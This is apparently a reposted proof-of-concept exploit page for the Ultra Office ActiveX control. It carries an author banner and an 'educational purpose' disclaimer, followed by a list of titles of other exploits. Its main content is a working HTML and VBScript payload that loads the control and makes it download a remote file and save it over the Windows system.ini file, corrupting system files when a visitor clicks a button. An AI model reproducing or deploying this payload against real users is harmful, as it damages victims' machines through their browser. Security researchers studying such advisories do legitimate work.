-----------------------------------------------------------------------------
Ultra Office ActiveX Control Remote Arbitrary File Corruption
url: http://www.ultrashareware.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:00989888-BB72-4e31-A7C6-5F819C24D2F7' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
dim remURL
remURL = "http://SomeSite.com/SomeFile.doc"
test.Open remURL, True
test.Save "C:WINDOWS_system.ini", True
End Sub
</script>
【Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit】相关文章:
★ PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
★ NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
★ TGS CMS 0.3.2r2 Remote Code Execution Exploit
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
★ Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
★ Joomla Component EZ Store Remote Blind SQL Injection Exploit
★ CodeDB (list.php lang) Local File Inclusion Vulnerability
★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
★ WebCMS Portal Edition (id) Remote SQL Injection Vulnerability
★ HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit